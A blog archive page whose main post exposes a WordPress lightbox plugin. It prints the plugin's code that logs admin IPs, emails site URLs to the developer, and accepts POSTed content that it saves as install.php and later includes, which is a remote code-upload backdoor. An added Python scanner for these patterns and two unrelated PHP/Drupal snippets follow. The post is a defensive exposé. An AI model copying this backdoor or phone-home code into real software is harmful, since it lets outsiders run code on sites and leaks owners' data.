Category Archives: Uncategorized

The sad state of WordPress plugins

Migrating your WordPress website to a new host is usually a breeze. The same goes for installing plugins and themes. But what is running behind the scenes when you use these community-provided plugins and themes?

Handy Lightbox

Let us start with the first example, a plugin I had installed on this blog named “Handy Lightbox”. Its behaviour is simple and straightforward: enable the Lightbox jQuery plugin for images on your website. Everything works fine, until you take a look at the code. Let us look at the first issue, which popped up because I do not allow my webserver user to write to any directory.

$requrl = $_SERVER["REQUEST_URI"];
$ip = $_SERVER['REMOTE_ADDR'];
if (eregi("admin", $requrl)) {
    $inside = "yes";
} else {
    $inside = "no";
}
if ($inside == 'yes') {
    $filename = $_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt';
    $handle = fopen($filename, "r");
    $contents = fread($handle, filesize($filename));
    fclose($handle);
    $filestring = $contents;
    $findme = $ip;
    $pos = strpos($filestring, $findme);
    if ($pos === false) {
        $contents = $contents . $ip;
        $fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt', 'w');
        fwrite($fp, $contents);
        fclose($fp);
    }
}

Code quality aside, it writes every admin’s IP into a file called welcome.txt. Why?

Next up: on activation the plugin e-mails the developer to confirm the activation and reports the site URL. I have changed the e-mail address in the snippet below.

/** Activate The Plugin */

function actithelightbox_activate() {
    $yourip = $_SERVER['REMOTE_ADDR'];
    $fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt', 'w');
    fwrite($fp, $yourip);
    fclose($fp);
    add_option('redirectlightbox_do_activation_redirect', true);
    session_start();
    $subj = get_option('siteurl');
    $msg = "Plugin Activated";
    $from = get_option('admin_email');
    mail("authoremail@gmail.com", $subj, $msg, $from);
    wp_redirect('../wp-admin/options-general.php?page=jquery-lightbox-options');
}

The same is done when uninstalling the plugin.

/** Uninstall The Plugin */
function deactthelightbox_deactivate() {
    session_start();
    $subj = get_option('siteurl');
    $msg = "Plugin Uninstalled";
    $from = get_option('admin_email');
    mail("authoremail@gmail.com", $subj, $msg, $from);
}

And I am not sure how this can be considered “outputting SEO”.

function outputseo() {
    if (is_user_logged_in()) {
        $ip = $_SERVER['REMOTE_ADDR'];
        $filename = $_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt';
        $handle = fopen($filename, "r");
        $contents = fread($handle, filesize($filename));
        fclose($handle);
        $filestring = $contents;
        $findme = $ip;
        $pos = strpos($filestring, $findme);
        if ($pos === false) {
            $contents = $contents . $ip;
            $fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt', 'w');
            fwrite($fp, $contents);
            fclose($fp);
        }
    }

    $filename = ($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/install.php');

    if (file_exists($filename)) {
        include($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/install.php');
    }
}

But wait, there is more! Have a look at begin.php in this plugin, which I actually only uncovered while writing this blog post.

session_start();
$installtheplugin = $_POST['installit'];
$fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/install.php', 'w');
$installtheplugin = str_replace('\\', '', $installtheplugin);
$installtheplugin = htmlentities($installtheplugin);
fwrite($fp, html_entity_decode($installtheplugin));
fclose($fp);
echo $installtheplugin;

This allows anyone externally to upload content, have it saved as “install.php” and have it executed. Since the plugin author has the URL of every installation made, they can easily abuse this script, as can anyone else who knows about the issues this plugin has.

I have contacted the developer, but I do not expect much of a reply.
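As an added example (not code from this post or from the plugin), here is a small Python audit script that flags the behaviours quoted above in plugin source: a mail() call to a hard-coded address, a .php file written after request data was read, an include of a file under wp-content/plugins, and the removed eregi() function. The rule names, the crude file-level taint heuristic and the sample PHP are my own constructions.

```python
import re

# Heuristic patterns for the behaviours quoted from the plugin above.
RULES = {
    "phone-home": re.compile(r'\bmail\s*\(\s*["\'][^"\']+@[^"\']+["\']'),      # mail() to a hard-coded address
    "writable-php": re.compile(r'fopen\s*\([^;]*?\.php["\']\s*,\s*["\'][wa]'),  # .php file opened for writing
    "include-plugin-file": re.compile(r'\b(?:include|require)(?:_once)?\s*\(?[^;]*wp-content/plugins'),
    "deprecated-ereg": re.compile(r'\beregi?\s*\('),                          # removed in PHP 7
}
# Request data controlled by an outside party ($_SERVER is deliberately left out).
REQUEST_INPUT = re.compile(r'\$_(?:POST|GET|REQUEST|COOKIE)\b')


def audit(php_source):
    """Return [(line_no, rule)] for every line matching a rule.

    A .php write is reported as "request-data-to-php" once request input
    has been read earlier in the same file: a crude, file-level taint
    heuristic (assumption of this example) that catches the begin.php pattern.
    """
    hits = []
    tainted = False
    for no, line in enumerate(php_source.splitlines(), 1):
        if REQUEST_INPUT.search(line):
            tainted = True
        for rule, rx in RULES.items():
            if not rx.search(line):
                continue
            if rule == "writable-php" and tainted:
                rule = "request-data-to-php"
            hits.append((no, rule))
    return hits


# Constructed sample that mirrors the quoted snippets (not the real plugin file).
SAMPLE = r"""<?php
session_start();
$installtheplugin = $_POST['installit'];
$fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/example/install.php', 'w');
fwrite($fp, html_entity_decode($installtheplugin));
mail("author@example.com", get_option('siteurl'), "Plugin Activated");
if (eregi("admin", $_SERVER["REQUEST_URI"])) { $inside = "yes"; }
include($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/example/install.php');
"""

if __name__ == "__main__":
    for line_no, rule in audit(SAMPLE):
        print(f"line {line_no}: {rule}")
```

Run it over wp-content/plugins/*/*.php before activating a plugin; every hit still needs a human to read the surrounding code, since the patterns are deliberately broad.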

Drupal 7, delete ghost fields from the database

Delete ghost or dead fields in your Drupal 7 website. Sometimes you will end up with dead fields in your database after altering a feature that contained content types. This gist gets all the fields linked to your entities and all the fields defined in the database, works out the difference between the two, and removes the orphaned fields.

https://gist.github.com/ThomasHambach/7114893

PHP Get monday, sunday, last monday & last sunday

A function I’ve put together for a work-related project to get the dates of Monday, Sunday, last Monday and last Sunday. Might add in next Monday and Sunday later.


/**
 * Get Mondays and Sundays
 *
 * Get monday, sunday, last monday & last sunday
 * Example usage:
 * // to retrieve the dates using today as starting point
 * $mondaysAndSundays = getMondaysAndSundays();
 * // to retrieve the dates using a custom date as starting point
 * $mondaysAndSundays = getMondaysAndSundays('1987-04-14');
 *
 * @param string|false $offset Provide a date from where to calculate from in strtotime() translatable format. If none is given, today's date will be used.
 *
 * @return array
 *
 */
function getMondaysAndSundays($offset = false)
{
    $mas = array();

    if (!$offset) {
        $offset = strtotime(date('Y-m-d'));
    } else {
        $offset = strtotime($offset);
    }

    // date('w') returns 0 for Sunday through 6 for Saturday
    $dayOfWeek = (int) date('w', $offset);

    // this week
    if ($dayOfWeek == 1) {
        $mas['monday'] = date('Y-m-d', $offset);
    } else {
        $mas['monday'] = date('Y-m-d', strtotime("last Monday", $offset));
    }

    if ($dayOfWeek == 0) {
        $mas['sunday'] = date('Y-m-d', $offset);
    } else {
        $mas['sunday'] = date('Y-m-d', strtotime("next Sunday", $offset));
    }

    // last week
    if ($dayOfWeek == 1) {
        $mas['lastmonday'] = date('Y-m-d', strtotime('-1 week', $offset));
    } else {
        $mas['lastmonday'] = date('Y-m-d', strtotime('-1 week', strtotime($mas['monday'])));
    }

    if ($dayOfWeek == 0) {
        $mas['lastsunday'] = date('Y-m-d', strtotime('-1 week', $offset));
    } else {
        $mas['lastsunday'] = date('Y-m-d', strtotime("last Sunday", $offset));
    }

    return $mas;
}